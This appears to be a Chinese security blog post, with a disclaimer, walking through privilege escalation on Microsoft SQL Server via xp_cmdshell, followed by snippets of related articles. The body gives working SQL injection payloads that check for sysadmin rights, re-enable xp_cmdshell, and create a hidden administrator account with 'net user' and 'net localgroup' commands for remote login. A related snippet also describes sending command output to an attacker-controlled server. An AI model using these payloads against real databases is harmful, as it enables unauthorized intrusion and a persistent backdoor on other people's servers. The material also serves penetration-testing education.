MSSQL提权之xp_cmdshell

最新推荐文章于 2025-03-29 21:49:17 发布
原创 最新推荐文章于 2025-03-29 21:49:17 发布 · 1.6k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sqlserver #数据库

免责声明

本博客文章仅供教育和研究目的使用。本文中提到的所有信息和技术均基于公开来源和合法获取的知识。本文不鼓励或支持任何非法活动,包括但不限于未经授权访问计算机系统、网络或数据。

作者对于读者使用本文中的信息所导致的任何直接或间接后果不承担任何责任。包括但不限于因使用本文所述技术而可能导致的法律诉讼、财产损失、隐私泄露或其他任何形式的责任。

在进行任何渗透测试或安全研究之前,请确保您已获得所有必要的授权,并遵守适用的法律和道德准则。未经授权的安全测试可能违反法律,并可能导致严重的法律后果。

本文中的内容仅供参考,不应被视为专业建议。在进行任何安全相关活动之前,建议咨询具有相应资质的专业人士。

简介

xp_cmdshell 是一个 SQL Server 的扩展存储过程。它的主要作用是在 SQL Server 环境中提供一种机制,使得 SQLServer 能够与操作系统的命令行进行交互。这意味着可以直接在 SQL Server 的查询窗口或者存储过程中执行操作系统层面的命令,就好像在操作系统的命令提示符(如 Windows 的 CMD 或Linux 的 Shell)下执行一样。

在SQL Server中,xp_cmdshell默认是关闭,因此我们需要将其打开。

一.前提

1.getshell或者存在sql注入并且能够执行命令。

2.sql server是system权限,sql server默认就是system权限。

二.渗透步骤

1.判断注入点是否为sa权限

and 1=(select IS_SRVROLEMEMBER('sysadmin'))

在sqlsever数据库中查询是否为sa权限

select IS_SRVROLEMEMBER('sysadmin')

2.恢复xp_cmdshell可以用

因为该组件有危害,所以该组件默认是关闭的,因此需要将它打开。

;exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;

3.创建用户并加入管理员组

;exec master..xp_cmdshell 'net user test test /add'

;exec master..xp_cmdshell 'net localgroup administrators test /add'

5.查看Windows Server 2003用户组,发现test已经创建并且被添加到了管理员组

6.远程连接

连接成功

7.关闭xp_cmdshell

;exec sp_configure 'show advanced options', 1;reconfigure;exec sp_configure 'xp_cmdshell', 0;reconfigure;

8.再次创建用户,发现会报错,这就说明xp_cmdshell被关闭了

;exec master..xp_cmdshell 'net user abc abc /add'

SQL Server数据库xp_cmdshell权笔记
千寻的博客
06-04 3841
SQL Server数据库xp_cmdshell
MSSQL注入利用xp_cmdshell执行命令(细)
墨痕诉清风的博客
04-28 2371
与MySQL不同,MSSQL供了,它允许我们执行系统命令在xp_cmdshell中,大多数时候我们都有特权使用cmd,最重要的是,使用powershell。现在,我们将在powershell中使用curl将命令输出发送到我们的受控服务器。
MSSQLxp_cmdshell利用
最新发布
fcx_666666的博客
03-29 1373
拿到SQL注入不知道怎么升危害?本文教你如何在拥有对mssql数据库操作的权限下通过XP_cmdshell拿到shell
数据库权-mssql通过xp_cmdshell
cxrpty的博客
03-12 4685
实验思路:1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比 管理员小;而在2003以上的版本,则为最高权限。 ⭐ 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使用sa连...
XP_cmdshell
热门推荐
飞轩亭
08-14 2万+
一、简介        xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 三、SQL Server 2005中的xp_cmdshell         由于存在安全隐患,所以在SQL Server 2005中, xp_cmdshell 默认是关闭的。        此时,如果执行 xp_cmdshell 将会示服务未开启:    
SQL注入中利用XP_cmdshell权的用法
得峰的专栏 [网络收藏]
05-15 2793
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口14
Windows权之Mssql(sql server)数据库权(xp_cmdshell权)
mrx56的博客
05-18 1656
利用大马或者webshell管理工具登录mssql数据库,执行以下sql命令检查xp_cmdshell是否存在。也可以利用SQL注入。如果xplog70.dll也删除了可以自己上传一个或者执行以下命令恢复。结果为1,则证明存在。当结果为0时,可以通过下列命令恢复。使用xp_cmdshel执行命令。
数据库权】MySQL权之UDF
ssrf
10-24 1403
文章目录一、什么是UDF?二、什么是动态链接库?三、UDF权原理 一、什么是UDF? UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像本机函数如ABS()或SOUNDEX()一样方便。 二、什么是动态链接库? DLL 是 Dynamic Link Library 的缩写,译为“动态
深入解析MySQL中的mysql_native_password与ALTER USER命令:数据库安全性的利器
u013558123的博客
04-21 1万+
mysql_native_password是MySQL数据库中的一个重要身份验证插件,它通过哈希和加密用户密码来保护数据库的安全。通过使用ALTER USER命令,我们可以轻松地配置mysql_native_password,以确保只有授权用户才能访问数据库。虽然它已经不是MySQL 8.0及更高版本的默认身份验证插件,但在某些情况下,它仍然是一个有用的选择。
权限升-mysql权总结
告白的博客
09-06 1292
0x00 mysql数据库权方式简介 1)udf权 2)mof权 3)启动项权-反弹shell-exp权思路:1.探针数据库的存在-端口服务,2.必须获取到数据库的权限密码,3.数据库的类型分类 重点:数据库的账号密码获取方式, 1.网站配置文件sql data inc config conn database commin include等 2.读取数据库备份文件下的库中表等信息,数据库名/表名.MYD文件储存密码,例如mysql数据库在mysql_user表中储存账户密码,使用
mssql数据库权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
数据库权,Mssql xp_cmdshell
luSaMa的博客
07-06 3008
针对Mssql xp_cmdshell权的学习实践,SQL Server2008/2012及以前版本基本都能用,但是2016或更高版本部分不能用,或者SA权限太低,导致无法权。数据库权的方式也不止有Mssql xp_cmdshell一种,之后更多的权方式也是我更应该学习的地方。
关于xp_cmdshell
qq_42036164的博客
12-28 1353
xpcmdshell
SQLserver中的xp_cmdshell
ajsyipsc40270的博客
12-09 636
shell是用户与操作系统对话的一个接口,通过shell告诉操作系统让系统执行我们的指令 xp_cmdshellsqlserver中默认是关闭的存在安全隐患。 --打开xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;...
xp_cmdshell
无很的专栏
12-02 456
语法 xp_cmdshell {'command_string'} [, no_output] 参数 'command_string' 是在操作系统命令行解释器上执行的命令字符串。command_string 的数据类型为 varchar(255) 或 nvarchar(4000),没有默认值。command_string 不能包含一对以上的双引号。如果由 command_string 引...
打开'xp_cmdshell'
weixin_34032827的博客
02-08 97
--要先启用高级选项配置 EXEC sp_configure 'show advanced options', 1; RECONFIGURE; --再打开'xp_cmdshell' EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master..xp_cmdshell 'bcp "dC.dbo.C_ListTab...
操作系统权限升(二十九)之数据库权-SQL Server xp_cmdshell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-23 755
xp_cmdshell可以执行系统命令,该组件默认是关闭的,因此需要把它打开。xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值